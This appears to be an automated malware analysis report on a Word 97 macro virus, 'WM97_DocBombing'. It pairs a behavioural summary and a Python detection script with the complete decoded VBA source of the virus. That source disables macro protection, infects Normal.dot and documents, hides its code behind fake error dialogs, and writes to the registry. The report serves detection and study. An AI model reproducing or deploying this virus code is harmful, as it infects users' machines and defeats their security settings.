Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6339e74d035eca4e…

MALICIOUS

Office (OLE)

38.0 KB Created: 2001-05-31 12:38:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: e358705cf5ff246527159f30d1f4a488 SHA-1: aafd2fc2ff6c84e0e57ff1a19b428769c0577561 SHA-256: 6339e74d035eca4e309170045eacef6581cefcb0b9093851893cf40d18c46dda
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word 97 document carrying a single VBA module named 'WM97_DocBombing'; the module's own comments identify it as "WM97_DocBombing Macro Virus ver1.2.03 by Vortex" and credit the Melissa macro. Its Document_Open handler is a classic class infector. Under 'On Error Resume Next' it turns off Options.VirusProtection (Word 97's macro warning) and Options.SaveNormalPrompt (so the modified Normal.dot is saved silently), then uses the VBProject.VBComponents object model to copy its code between the active document and the Normal.dot template (NormalTemplate), renaming the target module to 'WM97_DocBombing' so that already-infected hosts are skipped. The copy written into Normal.dot starts with 'Private Sub Document_Close()' and the copy written into a document starts with 'Private Sub Document_Open()', which is why the carved module opens with both declarations. The template copy also receives ViewVBCode and ToolsMacro procedures: these override Word's built-in Visual Basic Editor and Tools > Macro commands, so a user who tries to inspect the macros gets a fake "This program has performed an illegal operation and will shut down" dialog instead of the code. The error message is therefore a stealth measure triggered by the user, not something shown on every open. A date-gated payload (day of month >= 6, month >= 11, year >= 2000) sets the Word caption to "WM97_DocBombing virii !!", writes "Vortex!!" to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RegisteredOwner through System.PrivateProfileString, rewrites the author of the first document comment, and opens 21 new blank documents (the "DocBombing"). The Document_Open auto-execution, the Normal.dot infection and the macro-security tampering together establish malicious intent.
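The indicators above (auto-exec handler, VBProject/NormalTemplate access, CodeModule writes, VirusProtection off, ViewVBCode/ToolsMacro overrides, registry write, and the per-field date gate) can be checked mechanically over the decoded VBA source that olevba carves out. The following is an added triage example written for this report; it is not code from the sample, from oletools or from ClamAV. The indicator names, regexes and the verdict logic are this example's own choices, and the embedded VBA excerpt is a constructed excerpt modelled on the carved module, not the sample's bytes. It also evaluates the payload's date gate to show that the nested Day/Month/Year comparison fires only on 51 days per year, not "from 6 Nov 2000 onward".

```python
"""Triage helpers for WM97-style VBA class infectors.

Added example for this report. It is not code from the analyzed sample, from
oletools, or from ClamAV; it runs over decoded VBA source text (what olevba
carves out as macros.bas) and over plain year/month/day integers, so it works
offline. The indicator names and regexes are this example's own choices.
"""
import calendar
import re

# Each indicator: (rule id, meaning, regex over VBA source). The behaviours are
# the ones visible in the WM97_DocBombing module; treat this as a triage
# starting point, not a complete signature set.
INDICATORS = [
    ("AUTO_EXEC", "event handler that runs without user action",
     re.compile(r"^[ \t]*(?:Private|Public)?[ \t]*Sub[ \t]+"
                r"(?:Document_Open|Document_Close|AutoOpen|AutoClose|AutoExec)\b",
                re.I | re.M)),
    ("VBPROJECT_ACCESS", "VBA project object model (code read/write primitive)",
     re.compile(r"\.VBProject\.VBComponents", re.I)),
    ("NORMAL_TEMPLATE", "reaches Normal.dot through NormalTemplate",
     re.compile(r"\bNormalTemplate\b", re.I)),
    ("CODEMODULE_WRITE", "rewrites macro code at run time",
     re.compile(r"\.CodeModule\.(?:InsertLines|DeleteLines|AddFromString)\b", re.I)),
    ("MACRO_SECURITY_OFF", "turns off Word 97 macro virus protection",
     re.compile(r"Options\.VirusProtection[ \t]*=[ \t]*False", re.I)),
    ("SAVE_NORMAL_PROMPT_OFF", "suppresses the 'save changes to Normal.dot' prompt",
     re.compile(r"Options\.SaveNormalPrompt[ \t]*=[ \t]*False", re.I)),
    ("MENU_HIJACK", "overrides built-in commands that would expose the macro code",
     re.compile(r"\bSub[ \t]+(?:ViewVBCode|ToolsMacro|FileTemplates|ToolsOptions)\b", re.I)),
    ("REGISTRY_WRITE", "registry write via PrivateProfileString with an empty file name",
     re.compile(r'PrivateProfileString\([ \t]*""[ \t]*,[ \t]*"HKEY_', re.I)),
    ("ERROR_SUPPRESSION", "On Error Resume Next hides failed steps",
     re.compile(r"On[ \t]+Error[ \t]+Resume[ \t]+Next", re.I)),
]


def scan_vba(source: str) -> dict:
    """Return {rule_id: [1-based line numbers]} for each indicator that fires."""
    hits = {}
    for rule_id, _meaning, pattern in INDICATORS:
        lines = sorted({source.count("\n", 0, m.start()) + 1
                        for m in pattern.finditer(source)})
        if lines:
            hits[rule_id] = lines
    return hits


def classify(hits: dict) -> str:
    """Collapse hits into a verdict. What makes a module a virus rather than a
    one-shot dropper is a code-writing primitive plus a handle on another
    project (the template or the active document), fired from an auto-exec."""
    replicates = ("CODEMODULE_WRITE" in hits
                  and ("NORMAL_TEMPLATE" in hits or "VBPROJECT_ACCESS" in hits))
    if replicates and "AUTO_EXEC" in hits:
        return "malicious: self-replicating macro virus"
    if "MACRO_SECURITY_OFF" in hits or "MENU_HIJACK" in hits:
        return "suspicious: macro security tampering"
    if "AUTO_EXEC" in hits:
        return "suspicious: auto-executing macro"
    return "no indicators"


def payload_triggers(year: int, month: int, day: int) -> bool:
    """The sample's date gate, field by field: Day>=6 AND Month>=11 AND Year>=2000.
    This is not 'on or after 6 Nov 2000': the 1st to 5th of November and of
    December never fire, and October never fires in any year."""
    return day >= 6 and month >= 11 and year >= 2000


def trigger_days(year: int) -> int:
    """Number of days in `year` on which the payload would run."""
    return sum(1 for month in range(1, 13)
               for day in range(1, calendar.monthrange(year, month)[1] + 1)
               if payload_triggers(year, month, day))


# Constructed excerpt modelled on the carved module (not the sample's bytes).
SAMPLE_VBA = r'''Attribute VB_Name = "WM97_DocBombing"
Private Sub Document_Open()
On Error Resume Next
Set AD = ActiveDocument.VBProject.VBComponents.Item(1)
Set NT = NormalTemplate.VBProject.VBComponents.Item(1)
Options.SaveNormalPrompt = False
Options.VirusProtection = False
NT.CodeModule.DeleteLines 1, NTCL
NT.CodeModule.InsertLines 1, "Private Sub Document_Close()"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "RegisteredOwner") = "Vortex!!"
End Sub
Public Sub ViewVBCode()
MsgBox "This program has performed an illegal operation and will shut down.", vbCritical, "Microsoft Visual Basic"
End Sub
'''

# Constructed benign control: a formatting macro with none of the indicators.
BENIGN_VBA = "Sub BoldHeading()\nSelection.Font.Bold = True\nEnd Sub\n"

if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_VBA), ("benign", BENIGN_VBA)):
        hits = scan_vba(src)
        print(name, "->", classify(hits))
        for rule_id, meaning, _ in INDICATORS:
            if rule_id in hits:
                print(f"  {rule_id:<22} lines {hits[rule_id]}  {meaning}")
    print("payload days in 2000:", trigger_days(2000), "| in 1999:", trigger_days(1999))
```

Run it against the real carved macros.bas by reading the file into `scan_vba`; the verdict logic deliberately requires the replication primitive plus an auto-exec before calling something a virus, so a document that merely has a Document_Open handler stays at "suspicious". Note that in current Office the VBProject object model is blocked unless "Trust access to the VBA project object model" is enabled, and the 'On Error Resume Next' in the sample would silently swallow that failure, so absence of infection on a modern test machine does not mean the code is inert on Word 97.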

Heuristics 3

  • ClamAV: Doc.Trojan.DB-1 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.DB-1
  • VBA macros detected (medium, OLE_VBA_MACROS, 1 related finding)
    Document contains VBA macro code
  • Document_Open macro (high, OLE_VBA_DOCOPEN)
    Document_Open event handler: the macro runs automatically when the document is opened, without the user invoking anything

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 10979 bytes
SHA-256: 327630388c09aaf66603b53a065c526fc05e777bdcb7ece2f32d8fb7ded42f39
Detection: ClamAV: Doc.Trojan.DB-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "WM97_DocBombing"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Close()
Private Sub Document_Open()
On Error Resume Next
Dim ToInfectNT As Boolean, ToInfectAD As Boolean
Dim Bcl As Integer, NTCL As Integer, ADCL As Integer

Set AD = ActiveDocument.VBProject.VBComponents.Item(1)
Set NT = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NT.CodeModule.CountOfLines
ADCL = AD.CodeModule.CountOfLines

Options.SaveNormalPrompt = False
Options.VirusProtection = False

If (NT.Name) <> "WM97_DocBombing" Then
    NT.CodeModule.DeleteLines 1, NTCL
    ToInfectNT = True
    NT.Name = "WM97_DocBombing"
End If

If (AD.Name) <> "WM97_DocBombing" Then
    AD.CodeModule.DeleteLines 1, ADCL
    ToInfectAD = True
    AD.Name = "WM97_DocBombing"
End If

If (ToInfectNT = True And ToInfectAD = False) Then
    NT.CodeModule.InsertLines 1, "Private Sub Document_Close()"
    For Bcl = 2 To ADCL
        NT.CodeModule.InsertLines Bcl, AD.CodeModule.Lines(Bcl, 1)
    Next Bcl
    NT.CodeModule.InsertLines Bcl + 1, "Public Sub ViewVBCode()"
    NT.CodeModule.InsertLines Bcl + 2, "MsgBox " + """" + "This program has performed an illegal operation and will shut down." + """" + ", vbCritical, " + """" + "Microsoft Visual Basic" + """"
    NT.CodeModule.InsertLines Bcl + 3, "End Sub"
    
    NT.CodeModule.InsertLines Bcl + 4, "Public Sub ToolsMacro()"
    NT.CodeModule.InsertLines Bcl + 5, "MsgBox " + """" + "This program has performed an illegal operation and will shut down." + """" + ", vbCritical, " + """" + "Microsoft Word" + """"
    NT.CodeModule.InsertLines Bcl + 6, "End Sub"
End If

If (ToInfectNT = False And ToInfectAD = True) Then
    AD.CodeModule.InsertLines 1, "Private Sub Document_Open()"
    For Bcl = 2 To NTCL - 6
        AD.CodeModule.InsertLines Bcl, NT.CodeModule.Lines(Bcl, 1)
    Next Bcl
End If


If (Day(Now()) >= 6) Then
    If (Month(Now()) >= 11) Then
        If (Year(Now()) >= 2000) Then
            ActiveDocument.Windows.Application.Caption = "WM97_DocBombing virii !!"
            System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "RegisteredOwner") = "Vortex!!"
            With ActiveDocument.Comments(1)
                .Author = "WM97_DocBombing"
                .Initial = "WM97_DB"
            End With
            For Bcl = 0 To 20
                Documents.Add
            Next Bcl
        End If
    End If
End If

'*** WM97_DocBombing Macro Virus ver1.2.03 by Vortex***
'Dedicasse au Condor (on est tous avec toi, Kevin !!!)
'Remerciements egalement a Kwyjibo pour l'excellente macro 'Melissa'
'Enjoy !!
End Sub

Public Sub ViewVBCode()
MsgBox "This program has performed an illegal operation and will shut down.", vbCritical, "Microsoft Visual Basic"
End Sub
Public Sub ToolsMacro()
MsgBox "This program has performed an illegal operation and will shut down.", vbCritical, "Microsoft Word"
End Sub
Public Sub ViewVBCode()
MsgBox "This program has performed an illegal operation and will shut down.", vbCritical, "Microsoft Visual Basic"
End Sub
Public Sub ToolsMacro()
MsgBox "This program has performed an illegal operation and will shut down.", vbCritical, "Microsoft Word"
End Sub

' Processing file: /opt/analyzer/scan_staging/bee9236f15524de8b38a6faeb2c486b6.bin
' ===============================================================================
' Module streams:
' Macros/VBA/WM97_DocBombing - 6214 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_Close())
' Line #1:
' 	FuncDefn (Private Sub Document_Open())
' Line #2:
' 	OnError (Resume Next) 
' Line #3:
' 	Dim 
' 	VarDefn ToInfectNT (As Boolean)
' 	VarDefn ToInfectAD (As Boolean)
' Line #4:
' 	Dim 
' 	VarDefn Bcl (As Integer)
' 	VarDefn NTCL (As Integer)
' 	VarDefn ADCL (As Integer)
' Line #5:
' Line #6:
' 	SetStmt 
' 	LitDI2 0x0001
... (truncated)